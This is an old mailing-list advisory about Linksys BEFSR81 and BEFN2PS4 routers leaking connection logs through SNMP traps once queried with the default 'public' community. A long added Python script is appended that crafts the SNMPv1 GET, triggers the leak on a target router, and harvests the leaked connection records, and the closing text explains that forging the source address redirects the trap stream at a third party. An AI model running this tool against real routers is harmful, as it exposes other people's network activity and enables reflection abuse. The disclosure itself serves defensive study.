 
From: Matthew S. Hallacy (poptixtechmonkeys.org)
Date: Sun Jan 06 2002 - 06:55:17 CST


    Howdy.

    LinkSys DSL 'routers' have some serious information leakage, and potential DDoS
    usage. The following models have been confirmed as having this problem:
    BEFN2PS4 (EtherFast Cable/DSL Router & Voice with 4-Port Switch)
    BEFSR81 (EtherFast Cable/DSL Router with 8-Port Switch)

    Querying these devices with the default community of 'public' causes them to set
    the address that queried as their snmptrap host, dumping traffic such as the
    following to that address:

    Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 24.254.60.13[110]."
    Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.23[5632]."
    Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.3[5632]."
    Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.4[5632]."
    Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.5[5632]."
    Enterprise Specific Trap (1) Uptime: 2 days, 6:04:38.11, enterprises.3955.1.1.0 = "-->[U]Send OP: ^ps_status_q 15049C0DFC9B03166D55EA30474D04FB 9218583272 a .."
    Enterprise Specific Trap (1) Uptime: 2 days, 6:04:38.11, enterprises.3955.1.1.0 = "<--[U]Recv __: ^ps_status_r.15049C0DFC9B03166D55EA30474D04FB.\"\".0.."

    It looks like a combination of debugging information as well as traffic logging;
    many customers never use the configuration page, let alone change the SNMP
    communities. To make the matter worse, LinkSys refuses to distribute an MIB
    for the device, which is not surprising considering the SNMP implementation
    on the device is rather broken (it goes into a continuous loop).

    LinkSys is routing all messages regarding SNMP to /dev/null

                            Have a nice day.
                            Matthew S. Hallacy

    -- 
    

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org

    iD8DBQE8OEk0XbLQQwGTggMRArzQAJwM0m2nqAksdB79845QtXW4/uTfNwCgxp68
    25wsxUpm0IQnOM/pqIxR4Ww=
    =tmmB
    -----END PGP SIGNATURE-----
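The post describes two things a practitioner would want to reproduce: the SNMPv1 GET with the default community that flips the router's trap destination, and the harvesting of the connection log the resulting traps carry. The script below is an added example, not code from the original post or from LinkSys. It assumes exactly the behaviour the post reports (a GET from host X makes the router send its enterprises.3955.1.1.0 traps to X), hand-rolls the small piece of BER an SNMPv1 GetRequest needs so that only the standard library is required, and uses the trap strings quoted in the post as constructed sample input. The script name, the sysDescr.0 probe OID and the "in" direction keyword (only "out" records appear in the post) are assumptions.

```python
"""Trigger and harvest the LinkSys BEFSR81 / BEFN2PS4 SNMP trap leak.

Added example (not the post's or LinkSys' code). Assumes the behaviour the
post describes: one SNMPv1 GET with community 'public' makes the router send
enterprise-specific traps carrying connection-log strings to the querying host.
"""
import re
import socket
import sys
from collections import Counter
from dataclasses import dataclass
from typing import List

SYS_DESCR = "1.3.6.1.2.1.1.1.0"   # assumption: any readable OID works; sysDescr.0 is the usual probe

# --- minimal BER: just enough to build an SNMPv1 GetRequest (RFC 1157) ------
def _ber_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(payload)) + payload

def _ber_int(v: int) -> bytes:
    # shortest two's-complement encoding (keeps a leading 0x00 when bit 7 is set)
    return _tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))

def _ber_oid(oid: str) -> bytes:
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])          # first two arcs share one byte
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]                            # base-128, high bit = "more follows"
        while arc >> 7:
            arc >>= 7
            chunk.append(0x80 | (arc & 0x7F))
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))

def build_snmpv1_get(community: str, oid: str, request_id: int = 1) -> bytes:
    """Message{version 0, community, GetRequest-PDU[0]{id, status, index, varbinds}}."""
    varbind = _tlv(0x30, _ber_oid(oid) + b"\x05\x00")                   # OID + NULL value
    pdu = _tlv(0xA0, _ber_int(request_id) + _ber_int(0) + _ber_int(0)   # id, error-status, error-index
               + _tlv(0x30, varbind))
    return _tlv(0x30, _ber_int(0) + _tlv(0x04, community.encode()) + pdu)

# --- pulling the leaked records out of the traps ----------------------------
@dataclass(frozen=True)
class Connection:
    direction: str
    src: str
    dst: str
    dport: int

_IP = r"\d{1,3}(?:\.\d{1,3}){3}"
# Only "out" records appear in the post; "in" is assumed by symmetry.
CONN_RE = re.compile(rf"\b(?P<dir>in|out) (?P<src>{_IP}) ==> (?P<dst>{_IP})\[(?P<port>\d+)\]")

def extract_records(text: str) -> List[Connection]:
    """Works on snmptrapd-style log text and on a raw trap datagram decoded as
    latin-1: the record is a plain ASCII OCTET STRING inside the trap, so no BER
    decoder is needed to find it. Debug chatter ('^ps_status_q ...') does not match."""
    return [Connection(m["dir"], m["src"], m["dst"], int(m["port"]))
            for m in CONN_RE.finditer(text)]

def ports_hit(records: List[Connection]) -> Counter:
    """Destination-port histogram: what the LAN behind the router is talking to."""
    return Counter(r.dport for r in records)

# Trap payload lines quoted in the post (constructed sample input for this example).
SAMPLE_TRAPS = """\
Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 24.254.60.13[110]."
Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.23[5632]."
Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.3[5632]."
Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.4[5632]."
Enterprise Specific Trap (1) Uptime: 2 days, 19:00:23.36, enterprises.3955.1.1.0 = "out 192.168.1.200 ==> 216.120.8.5[5632]."
Enterprise Specific Trap (1) Uptime: 2 days, 6:04:38.11, enterprises.3955.1.1.0 = "-->[U]Send OP: ^ps_status_q 15049C0DFC9B03166D55EA30474D04FB 9218583272 a .."
"""

def main(argv: List[str]) -> int:
    """usage: linksys_trapleak.py <router-ip>  (hypothetical name; binding UDP/162 needs root)"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("", 162))                     # traps come back to the address that queried
    sock.settimeout(30)
    sock.sendto(build_snmpv1_get("public", SYS_DESCR), (argv[1], 161))
    try:
        while True:                          # the GetResponse arrives too; it yields no records
            data, (peer, _) = sock.recvfrom(4096)
            for rec in extract_records(data.decode("latin-1")):
                print(f"{peer}: {rec.direction} {rec.src} -> {rec.dst}:{rec.dport}")
    except socket.timeout:
        pass
    return 0

if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it from a host on the router's LAN (or from the WAN side, which is the point of the post) and a non-vulnerable device answers with a single GetResponse and nothing else; a vulnerable one follows up with the trap stream, and extract_records turns the trap bodies into (direction, src, dst, port) tuples. Because the trap destination is simply whichever address sent the GET, a GET with a forged source address points that stream at a third party, which is the DDoS angle the post raises. The only fix available to an owner, given the post, is on the configuration page: change the community strings and keep UDP/161 off the WAN interface.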